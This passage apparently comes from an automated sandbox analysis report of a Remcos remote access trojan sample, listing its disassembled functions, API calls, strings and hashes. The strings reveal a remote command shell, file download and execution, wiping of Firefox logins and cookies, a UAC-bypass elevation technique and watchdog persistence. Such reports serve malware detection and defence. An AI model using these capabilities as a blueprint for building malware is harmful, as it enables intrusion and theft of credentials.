                                              • CryptMsgGetParam.CRYPT32(?,00000006,00000000,00000000,?), ref: 00408937
                                                • Part of subcall function 004084F3: lstrcmpA.KERNEL32(1.3.6.1.4.1.311.2.1.12,?,004E9598,0000001C), ref: 0040852B
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,00000000,?), ref: 00408553
                                                • Part of subcall function 004084F3: LocalAlloc.KERNEL32(00000040,?), ref: 00408569
                                                • Part of subcall function 004084F3: CryptDecodeObject.CRYPT32(00010001,1.3.6.1.4.1.311.2.1.12,?,?,00000000,?,?), ref: 00408595
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040897F
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 004089CF
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00408A1F
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408A90
                                              • _strlen.LIBCMT ref: 00408BEC
                                              • CertFindCertificateInStore.CRYPT32(?,00010001,00000000,000B0000,?,00000000), ref: 00408C64
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00408E14
                                              • CertVerifyTimeValidity.CRYPT32(?,?), ref: 00408E2C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Crypt$ByteCharMultiWide$CertObjectTime$AllocCertificateDecodeFindLocalParamStore_strlen$FileQuerySystemValidityVerifylstrcmp
                                              • String ID: Certificate is valid from: %02d/%02d/%04d %02d:%02d until %02d/%02d/%04d %02d:%02d $Certificate was signed on: %02d/%02d/%04d %02d:%02d$Issuer: %s$Serial: %s$Subject: %s$Signer Certificate:$Even Balance, Inc.$MoreInfo Link : %s$Program Name : %s$Publisher Link : %s$Time Stamp Certificate
                                              • API String ID: 318054356-2987722516
                                              • Opcode ID: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction ID: 7d8227bbab4e461be6b82a648dd884efa89abed3f85ceb009fba5573162d0a8f
                                              • Opcode Fuzzy Hash: b6ab1c5a61adf519dfdb67f66f61e91087094ad8cf8c24daf6457fb125bf4222
                                              • Instruction Fuzzy Hash: F00210B294016CAEDB20DB95CD85EEAB7BCEB09314F0044EBB549E2541E7389F84CF65
                                              Function 000C6F06 Relevance: 34.1, APIs: 10, Strings: 9, Instructions: 849filesleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SetEvent.KERNEL32(?,?), ref: 000C6F28
                                              • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 000C6FF8
                                              • DeleteFileW.KERNEL32(00000000), ref: 000C7018
                                                • Part of subcall function 000DB42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB489
                                                • Part of subcall function 000DB42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB4BB
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB50C
                                                • Part of subcall function 000DB42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB561
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB568
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                                • Part of subcall function 000C6BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00125454,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C38
                                                • Part of subcall function 000C6BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,000C7273,00000000,?,0000000A,00000000), ref: 000C6C80
                                                • Part of subcall function 000C6BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,000C7273,00000000,?,0000000A,00000000,00000000), ref: 000C6CC0
                                                • Part of subcall function 000C6BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 000C6CDD
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                                • Part of subcall function 000C4468: WaitForSingleObject.KERNEL32(?,00000000,LL,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000), ref: 000C450E
                                                • Part of subcall function 000C4468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00133EE8,001345A8,00000000,?,?,?,?,?,000D4CE9), ref: 000C453C
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 000C7416
                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000C74F5
                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 000C773A
                                              • DeleteFileA.KERNEL32(?), ref: 000C78CC
                                                • Part of subcall function 000C7A8C: __EH_prolog.LIBCMT ref: 000C7A91
                                                • Part of subcall function 000C7A8C: FindFirstFileW.KERNEL32(00000000,?,00125AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B4A
                                                • Part of subcall function 000C7A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000C7B6E
                                              • Sleep.KERNEL32(000007D0), ref: 000C7976
                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 000C79BA
                                                • Part of subcall function 000DBB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 000DBC6C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                              • API String ID: 2918587301-1507758755
                                              • Opcode ID: 53659638ebb1ce7a7528fe9910d0fbf9597484c7ae9dfac35ac978668b7fdfd0
                                              • Instruction ID: ad3fa86b58f67a47dae7d82f8947a74c15c0c22efbbefd05197ceccf1d972255
                                              • Opcode Fuzzy Hash: 53659638ebb1ce7a7528fe9910d0fbf9597484c7ae9dfac35ac978668b7fdfd0
                                              • Instruction Fuzzy Hash: 24426172608340ABC618F774C8A7FEE77A5AF92710F40491DF946972D3EF609A09C693
                                              Function 000C5042 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 280pipesleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 000C508E
                                                • Part of subcall function 000F34CF: EnterCriticalSection.KERNEL32(00130D18,00135D2C,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F34D9
                                                • Part of subcall function 000F34CF: LeaveCriticalSection.KERNEL32(00130D18,?,000CAEAC,00135D2C,00116D97,?,00000000,00000000), ref: 000F350C
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              • __Init_thread_footer.LIBCMT ref: 000C50CB
                                              • CreatePipe.KERNEL32(00135CEC,00135CD4,00135BF8,00000000,0012556C,00000000), ref: 000C515E
                                              • CreatePipe.KERNEL32(00135CD8,00135CF4,00135BF8,00000000), ref: 000C5174
                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00135C08,00135CDC), ref: 000C51E7
                                                • Part of subcall function 000F3519: EnterCriticalSection.KERNEL32(00130D18,?,00135D2C,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3524
                                                • Part of subcall function 000F3519: LeaveCriticalSection.KERNEL32(00130D18,?,000CAE8B,00135D2C,?,00000000,00000000), ref: 000F3561
                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 000C523F
                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 000C5264
                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 000C5291
                                                • Part of subcall function 000F38A5: __onexit.LIBCMT ref: 000F38AB
                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00133F98,00125570,00000062,00125554), ref: 000C538E
                                              • Sleep.KERNEL32(00000064,00000062,00125554), ref: 000C53A8
                                              • TerminateProcess.KERNEL32(00000000), ref: 000C53C1
                                              • CloseHandle.KERNEL32 ref: 000C53CD
                                              • CloseHandle.KERNEL32 ref: 000C53D5
                                              • CloseHandle.KERNEL32 ref: 000C53E7
                                              • CloseHandle.KERNEL32 ref: 000C53EF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                              • String ID: SystemDrive$cmd.exe
                                              • API String ID: 3815868655-3633465311
                                              • Opcode ID: cbf2d6aab6e3b30ad2e3cfacec53c7874fb4ac7be2242a92e815949c462e2ea8
                                              • Instruction ID: 1af27e34954c6db109e339a95ce818901a496ccd84e4f041f286b173cfe4345a
                                              • Opcode Fuzzy Hash: cbf2d6aab6e3b30ad2e3cfacec53c7874fb4ac7be2242a92e815949c462e2ea8
                                              • Instruction Fuzzy Hash: 1E911770604B04AFC704BB64ED41EAE77AEBB81B48F40042DF945A76A3DF349D858B61
                                              Function 000D0F36 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 000D0F45
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 000D0F81
                                              • CreateThread.KERNEL32(00000000,00000000,000D1637,00000000,00000000,00000000), ref: 000D0FE6
                                                • Part of subcall function 000D24B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                                • Part of subcall function 000D24B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                                • Part of subcall function 000D24B7: RegCloseKey.KERNEL32(?), ref: 000D2500
                                              • CloseHandle.KERNEL32(00000000), ref: 000D0F90
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 000D125A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                              • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                              • API String ID: 65172268-13974260
                                              • Opcode ID: 095b95602a5f487d36c7fb500e9e1cde475fedff19da706807fc185fb2a05606
                                              • Instruction ID: d2b5f254d63ab15e8623f2659c8e3bbf8bfbfe0e7c4fad6625cbc5103253e1c0
                                              • Opcode Fuzzy Hash: 095b95602a5f487d36c7fb500e9e1cde475fedff19da706807fc185fb2a05606
                                              • Instruction Fuzzy Hash: 05718031608341A7C618F770DC57EEEB7A5AF92710F40452DB482922D3EF609A19C6A3
                                              Function 000CB335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 000CB3B4
                                              • FindClose.KERNEL32(00000000), ref: 000CB3CE
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 000CB4F1
                                              • FindClose.KERNEL32(00000000), ref: 000CB517
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$CloseFile$FirstNext
                                              • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                              • API String ID: 1164774033-3681987949
                                              • Opcode ID: 7e5fb36bf324c8cfae97e5742e868225a8b7425e778b6db05a46611f9e170020
                                              • Instruction ID: eabb19978f2859caedb2db595c870e06261119a186ba0937004b66ed6d3648de
                                              • Opcode Fuzzy Hash: 7e5fb36bf324c8cfae97e5742e868225a8b7425e778b6db05a46611f9e170020
                                              • Instruction Fuzzy Hash: F1513E319045299BDB18FBB0DD56FED7779AF52310F40016DF806A21D3EF70AA8ACA54
                                              Function 000CB53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 000CB5B2
                                              • FindClose.KERNEL32(00000000), ref: 000CB5CC
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 000CB68C
                                              • FindClose.KERNEL32(00000000), ref: 000CB6B2
                                              • FindClose.KERNEL32(00000000), ref: 000CB6D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$Close$File$FirstNext
                                              • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                              • API String ID: 3527384056-432212279
                                              • Opcode ID: daeca0702860bda2ef77ef08a621ae374cce09983122bbe014a2eaaa7ea96c44
                                              • Instruction ID: 86163a28a51dd394ca64d042c7ba9572dfd5fdd1608b419a57e9b52b4de19c78
                                              • Opcode Fuzzy Hash: daeca0702860bda2ef77ef08a621ae374cce09983122bbe014a2eaaa7ea96c44
                                              • Instruction Fuzzy Hash: 21415E319042299BCB14F7B4ED57EEE7779AF22310F40005DF806A31D3EF745A868A95
                                              Function 000D59C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenClipboard.USER32 ref: 000D59C7
                                              • EmptyClipboard.USER32 ref: 000D59D5
                                              • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 000D59F5
                                              • GlobalLock.KERNEL32(00000000), ref: 000D59FE
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A34
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 000D5A3D
                                              • CloseClipboard.USER32 ref: 000D5A5A
                                              • OpenClipboard.USER32 ref: 000D5A61
                                              • GetClipboardData.USER32(0000000D), ref: 000D5A71
                                              • GlobalLock.KERNEL32(00000000), ref: 000D5A7A
                                              • GlobalUnlock.KERNEL32(00000000), ref: 000D5A83
                                              • CloseClipboard.USER32 ref: 000D5A89
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                              • String ID:
                                              • API String ID: 3520204547-0
                                              • Opcode ID: eed858fda5cff2ca45370d4a121a9d70161ffb83c2b095c42430eb99269e5a5f
                                              • Instruction ID: c295968ce42fb2f32b82678d40bbc5d472b14ceb46f4acf5c1db972af4408138
                                              • Opcode Fuzzy Hash: eed858fda5cff2ca45370d4a121a9d70161ffb83c2b095c42430eb99269e5a5f
                                              • Instruction Fuzzy Hash: B3215372604200ABD718BBB0DD5AEFE76B9AF91711F00491DF907C66D3EF3048459662
                                              Function 000CE219 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 212processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00134358), ref: 000CE233
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00134358), ref: 000CE25E
                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 000CE27A
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 000CE2FD
                                              • CloseHandle.KERNEL32(00000000,?,?,00134358), ref: 000CE30C
                                                • Part of subcall function 000D27D5: RegCreateKeyA.ADVAPI32(80000001,00000000,00125554), ref: 000D27E3
                                                • Part of subcall function 000D27D5: RegSetValueExA.KERNEL32(00125554,000000AF,00000000,00000004,00000001,00000004,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D27FE
                                                • Part of subcall function 000D27D5: RegCloseKey.ADVAPI32(00125554,?,?,?,000CB94C,001260E0,00000001,000000AF,00125554), ref: 000D2809
                                              • CloseHandle.KERNEL32(00000000,?,?,00134358), ref: 000CE371
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                              • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                              • API String ID: 726551946-1743721670
                                              • Opcode ID: f9d61f03c2dcabf9a30f547f677fc70b8eefa047e8d464031981e59ae9714bc5
                                              • Instruction ID: 950cf40a39f0dd17f245485e04db0b6332614bbdec3541337d97c7866e7960e7
                                              • Opcode Fuzzy Hash: f9d61f03c2dcabf9a30f547f677fc70b8eefa047e8d464031981e59ae9714bc5
                                              • Instruction Fuzzy Hash: 81714E311083419BC724FB60D895FEE77E5AF96354F40492DF986931A3EF70AA09CB52
                                              Function 000D8754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0$1$2$3$4$5$6$7
                                              • API String ID: 0-3177665633
                                              • Opcode ID: 50336a84f7350e247a2bdcfc2750f8fcc74afebcde8b9c468fee64a34382d0fe
                                              • Instruction ID: 6ef98c49bea8b74b3368ee0740aeddcc40d9fb31ac5c09e84a7327678515198c
                                              • Opcode Fuzzy Hash: 50336a84f7350e247a2bdcfc2750f8fcc74afebcde8b9c468fee64a34382d0fe
                                              • Instruction Fuzzy Hash: 26612A74508341AEDB14EB20D862FEE77E4AF95750F44884DF995572E2DF309A08CB63
                                              Function 000C6764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 000C6788
                                              • CoGetObject.OLE32(?,00000024,001259B0,00000000), ref: 000C67E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object_wcslen
                                              • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                              • API String ID: 240030777-3166923314
                                              • Opcode ID: e5778c71cb5c13cfc3a251249d5526c556f228b27c889bd4f2a860aecfb16c39
                                              • Instruction ID: 7a4ff175dcc803fd969e7ea25e6fbe4fb219aea64c53e741747273957a13fc40
                                              • Opcode Fuzzy Hash: e5778c71cb5c13cfc3a251249d5526c556f228b27c889bd4f2a860aecfb16c39
                                              • Instruction Fuzzy Hash: 9D1165B2900168AEDB14EBA4DD89FEEB7BCEB44710F54006DFA04F3181EB749A44CA75
                                              Function 000D98C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,001348F8), ref: 000D98D8
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 000D9927
                                              • GetLastError.KERNEL32 ref: 000D9935
                                              • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 000D996D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                              • String ID:
                                              • API String ID: 3587775597-0
                                              • Opcode ID: c23134cae76e64939d9aac4b2e5081a9d98c8a29b79806041a1799c541d42aeb
                                              • Instruction ID: d9e357d4b7b8e15fb36f61bf18987a01ff2aca70d0f880ef365b36b642cb7849
                                              • Opcode Fuzzy Hash: c23134cae76e64939d9aac4b2e5081a9d98c8a29b79806041a1799c541d42aeb
                                              • Instruction Fuzzy Hash: 39810E71108304AFC314EB20DD95EEFB7A8BF95714F50491EF58696293EF70AA05CBA2
                                              Function 000DB42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB489
                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB4BB
                                              • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB529
                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB536
                                                • Part of subcall function 000DB42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB50C
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB561
                                              • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB568
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,001342E0,001342F8), ref: 000DB570
                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,001342E0,001342F8), ref: 000DB583
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2341273852-0
                                              • Opcode ID: 548f3c251fb268a7b92f44dd060c08830275ce9f80041165dddb113010fe313e
                                              • Instruction ID: 36cc5986d202baa2173ba36f99667a5f83395048be8d9363900a461155f085e9
                                              • Opcode Fuzzy Hash: 548f3c251fb268a7b92f44dd060c08830275ce9f80041165dddb113010fe313e
                                              • Instruction Fuzzy Hash: 46314F7180865CAACB24DBB0EC4DFEA77BCAF15300F440596F605D3695EB759BC9CA20
                                              Function 00408E76 Relevance: 13.5, APIs: 9, Instructions: 39encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E8A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408E9A
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EAA
                                              • LocalFree.KERNEL32(00000000,00408E51), ref: 00408EB1
                                              • LocalFree.KERNEL32(?,00408E51), ref: 00408EC1
                                              • CertFreeCertificateContext.CRYPT32(?,00408E51), ref: 00408ED1
                                              • CertFreeCertificateContext.CRYPT32(?,00408E51), ref: 00408EE5
                                              • CertCloseStore.CRYPT32(?,00000000,00408E51), ref: 00408EFA
                                              • CryptMsgClose.CRYPT32(?,00408E51), ref: 00408F0E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270581057.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3270515339.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270723808.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3270940536.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000077B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000788000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.0000000000791000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.000000000079D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000002.00000002.3271454260.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_4wECQoBvYC.jbxd
                                              Similarity
                                              • API ID: Free$Local$Cert$CertificateCloseContext$CryptStore
                                              • String ID:
                                              • API String ID: 340922021-0
                                              • Opcode ID: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction ID: 17655f6d4f9585b093950d62dd86047068d7cbd7ae94d3a07630a22f26ce11e3
                                              • Opcode Fuzzy Hash: 98716ab120791c0f970d4b691cb4bbbbb3a86149c7f850876c4c0de7c4e8e56f
                                              • Instruction Fuzzy Hash: A6019731E061A9DBCF216F60DE844EEB672BB42351F1805FAE149709A18B350FD1DF5A
                                              Function 000D2F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 000D301A
                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 000D3026
                                                • Part of subcall function 000C4468: send.WS2_32(?,00000000,00000000,00000000), ref: 000C44FD
